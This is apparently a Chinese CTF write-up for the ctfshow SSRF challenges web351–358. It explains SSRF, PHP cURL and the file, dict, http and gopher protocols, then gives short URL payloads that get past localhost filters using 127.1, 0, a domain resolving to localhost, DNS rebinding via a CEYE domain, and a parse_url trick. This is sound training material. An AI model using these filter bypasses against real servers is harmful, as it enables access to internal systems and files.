改变的确很难,但结果值得冒险
本文如有错误之处,还请各位师傅指正
一.ssrf概述
SSRF全称为Server-side Request Fogery,中文含义服务器端请求伪造
SSRF是一种由攻击者构造形成由目标服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统(防火墙隔绝)。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
原由:大都是由于服务端提供了从其它服务器获取数据的功能,比如使用户从指定的URL web应用获取图片、下载文件、读取文件内容等。但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发送请求,并返回对该目标地址请求的数据。
- 判断是否为SSRF题目:题目源码出现以下函数file_get_contents()、curl()、fsocksopen()、fopen()
- 时可能有SSRF
- 常用协议:http://,file://,dict://,gopher://
二.curl会话
PHP中的cURL会话(cURL session)是通过cURL库提供的功能来进行HTTP请求的过程。cURL会话可以用于发送HTTP/HTTPS协议请求,获取服务器响应,并对请求和响应进行配置和处理。
支持的协议:dict file ftp ftps http https imap imaps ipfs ipns mqtt pop3 pop3s smb smbs smtp smtps telnet tftp
ssrf常用的四种协议包括file,dict,http,gopher
file协议:用于进行任意文件读取,是SSRF中最简单的利用方式。通过指定文件路径(如
file://
开头),攻击者可以尝试读取服务器上的任何文件,包括敏感信息或配置文件。http(s)协议:允许攻击者向目标发送HTTP请求,探测内网服务。由于GET请求的参数直接加在URL中,这使得探测那些使用GET请求的应用成为可能,进而进行内网探测和攻击。
dict协议:1.探测内网主机 2.探测端口的开放情况 3.探测端口的指纹信息 4.执行命令
gopher(万金油)协议:gopher协议允许通过Telnet远程访问其他应用程序,并使得Internet上的所有Gopher客户程序能够与Internet上的所有已“注册”的Gopher服务器进行对话。此外,Gopher协议支持发出GET和POST请求,这使得它能够在ssrf(服务器端请求伪造)攻击中发挥重要作用,例如攻击内网的MySQl,FTP,Telnet,Redis,Mencache等,同时也可以进行GET、POST请求。
使用cURL会话进行HTTP请求的基本步骤如下:
- 创建一个cURL会话句柄(curl_init)。
- 设置需要的选项,如请求的URL、请求方法、请求头、请求体等(curl_setopt)。
- 执行HTTP请求(curl_exec)。
- 获取服务器响应(可选)。
- 关闭cURL会话(curl_close)。
三.ctfshow之ssrf
web351:
使用dict协议查看哪个端口开放,来决定使用哪个协议:
url=dict://127.0.0.1:80成功回显,可以使用http协议
payload:url=127.0.0.1/flag.php
web352:
parse_url()函数:是用来解析一个URL并返回该URL的各个组成部分
- scheme: URL的协议部分http/https等等
- host: URL的主机名部分 //后的部分
- port: URL的端口部分
- user: URL的用户名部分 @前
- pass: URL的密码部分 @前
- path: URL的路径部分
- query: URL的查询字符串部分
- fragment: URL的锚点部分 #后
payload:url=http://127.0.0.1/flag.php
web353:
不能出现127.0.的部分
payload:url=http://127.1/flag.php
还可以通过编码绕过:16进制,10进制,8进制
web354:
不能出现0和1
使用域名指向,http://sudo.cc指向1270.0.1
payload:url=http://sudo.cc/flag.php
web355:
payload:url=http://127.1/flag.php
web356:
linux中0也可以访问本地
payload:url=http://0/flag.php
web357:
gethostbyname()函数是Linux系统中用于获取主机名对应IP地址的函数之一。
get_file_contens()函数读取域名后返回目标攻击ip
filter_var
函数来验证第一次返回真正IP地址的有效性,并且排除了私有IP范围(0.0.0.0/8、172.16.0.0/12和192.168.0.0/16
)和保留IP范围(0.0.0.0/8和169.254.0.0/16。
)。
这里采用DNS rebinding(DNS重新绑定攻击)绕过
攻击重点在于DNS服务能够在两次DNS查询中返回不同的IP地址,第一次是真正的IP,第二次是攻击目标IP地址,甚至可以通过这种攻击方法绕过同源策略。
在这个网站注册账号:CEYE - Monitor service for security testing
得到一个域名和两个ip
注意重定向时,域名的使用:r.域名
payload:url=http://r.zxfpib.ceye.io/flag.php
web358:
preg_match('/^http:\/\/ctf\..*show$/i',$url)
^:表示正则匹配的开始
^http:\/\/ctf\.:以
http://ctf.
开头
.*:匹配零个或任意个字符
$:匹配的结束表示
parse_url匹配的时候,@前的内容是user部分,#后的部分会被忽略
payload:url=http://ctf.@0/flag.php#show
或者 url=http://ctf.@0/flag.php?show